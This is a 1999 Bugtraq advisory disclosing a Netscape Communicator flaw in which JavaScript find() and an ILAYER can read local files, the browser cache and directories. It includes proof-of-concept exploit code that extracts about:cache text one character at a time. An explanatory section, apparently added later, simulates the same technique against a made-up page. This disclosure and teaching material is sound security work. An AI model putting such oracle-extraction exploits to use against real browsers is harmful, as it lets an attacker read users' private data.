Bugtraq mailing list archives

Netscape Communicator find() vulnerabilities


From: guninski () HOTMAIL COM (Georgi Guninski)
Date: Mon, 8 Mar 1999 19:48:05 +0200


There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I
guess all 4.x versions are vulnerable)
which allows the following security exploits:

 *)Reading the parsed content of local HTML files (by 'parsed' I mean
the text the user sees, not the actual HTML source)
 *)Reading the parsed content of HTML files on a web server blocked by a
firewall (the browser and the web server must be on the same side of the
firewall)
 *)Reading the user's cache
 *)Browsing directories
 *)Probably others

The exploits use the JavaScript find() function and the ILAYER tag.
This may be exploited using an HTML message.

Workaround: Disable JavaScript

Demonstration is available at:
 http://www.nat.bg/~joro/nsfind.html


-----------HTML code-------------
MBEGIN
<ILAYER SRC="wysiwyg://1/about:cache">
</ILAYER>

<SCRIPT>
// Search anchors: the layer's text lies between MBEGIN (above) and MEND
// (below) in the rendered page. 'Average cache' is a string the author
// expects in the about:cache page, so it serves as the starting prefix.
//mag='MBEGIN';
mag='Average cache';
mend='MEND';
res=mag;
charstoread=100;

function readit() {
for(i=0;i<charstoread;i++) {
 t=res;
 // Move the selection to MEND so that the backward search below runs over
 // the text in front of it, i.e. the layer's about:cache content.
 find(mend);
 // Try every byte value as the next character. find(text, caseSensitive,
 // backwards) only answers true/false, but that is enough to extend the
 // known prefix by one character per pass.
 for(c=1;c<256;c++) {
   t=res + String.fromCharCode(c);

     if (find(t,true,true)) {
//      alert(c);
      res=t;
     }
 }
}
// Strip the known prefix and show what was read out of the other document.
res=res.substring(mag.length);
alert("The first URL in your cache is: \n" + res);
}
// Give the layer time to load before reading it.
setTimeout('readit();',3000);
</SCRIPT>


MEND


---------------------------------

Regards,
Georgi Guninski
 http://www.nat.bg/~joro
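The technique in the advisory is a boolean-oracle extraction: find() never returns the text of the other document, it only says whether a given string occurs in the rendered page, and that one bit per query is enough to rebuild the text one character at a time. The following is an added example, not Guninski's code and not from Netscape: it runs the same prefix-extension loop against a simulated find() oracle over a constructed "rendered page" string (the cache statistics and the URL in it are made up), because current browsers no longer expose another origin's text to window.find(). It generalises the original slightly by stopping when no character extends the prefix and by counting how many oracle queries the extraction cost.

```javascript
// Constructed "rendered page": what the victim's browser would display, with
// the attacker's own MBEGIN/MEND markers around an ILAYER showing about:cache.
// The statistics line and the URL are invented for this example.
const renderedPage =
  "MBEGIN\n" +
  "Disk cache statistics\n" +
  "Average cache file size: 4096 bytes\n" +
  "http://intranet.example/secret/report.html\n" +
  "MEND\n";

// Simulated window.find(text, caseSensitive, backwards): true iff `needle`
// occurs in the rendered text. The `backwards` flag is accepted for shape only;
// the attack needs nothing but the boolean answer, and that answer is the leak.
function makeFindOracle(page) {
  let calls = 0;
  return {
    find(needle, caseSensitive = true, backwards = false) {
      calls++;
      const hay = caseSensitive ? page : page.toLowerCase();
      const n = caseSensitive ? needle : needle.toLowerCase();
      return hay.indexOf(n) !== -1;
    },
    get calls() { return calls; },
  };
}

// The advisory's loop, generalised: starting from a known prefix that occurs
// exactly once in the page, try every byte value 1..255 as the next character
// and keep the one find() confirms. Stops after maxChars characters or when no
// byte extends the prefix (end of the page). Returns the recovered text that
// follows the prefix. With a unique prefix at most one byte can match, so the
// early break below saves queries without changing the result.
function extractAfter(oracle, prefix, maxChars = 100) {
  let res = prefix;
  for (let i = 0; i < maxChars; i++) {
    let extended = false;
    for (let c = 1; c < 256; c++) {
      const t = res + String.fromCharCode(c);
      if (oracle.find(t, true, true)) {
        res = t;
        extended = true;
        break;
      }
    }
    if (!extended) break;
  }
  return res.substring(prefix.length);
}

// Convenience: recover a single line (e.g. the URL following a known
// statistics line), cutting the extracted text at the first newline.
function recoverLine(oracle, prefix, maxChars = 100) {
  const text = extractAfter(oracle, prefix, maxChars);
  const nl = text.indexOf("\n");
  return nl === -1 ? text : text.substring(0, nl);
}

// Demo run against the constructed page.
const demoOracle = makeFindOracle(renderedPage);
console.log("Recovered:", recoverLine(demoOracle, "bytes\n"),
            "after", demoOracle.calls, "find() calls");
```

The cost is linear in the length of the secret (at most 255 queries per character), which is why a 3-second timer and a few hundred characters were entirely practical in 1999. The defence that closed this class of bug is the same-origin policy applied to find() and to the contents of embedded documents, not anything about about:cache itself: any boolean primitive that reports on another origin's rendered text is a full-text read oracle.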


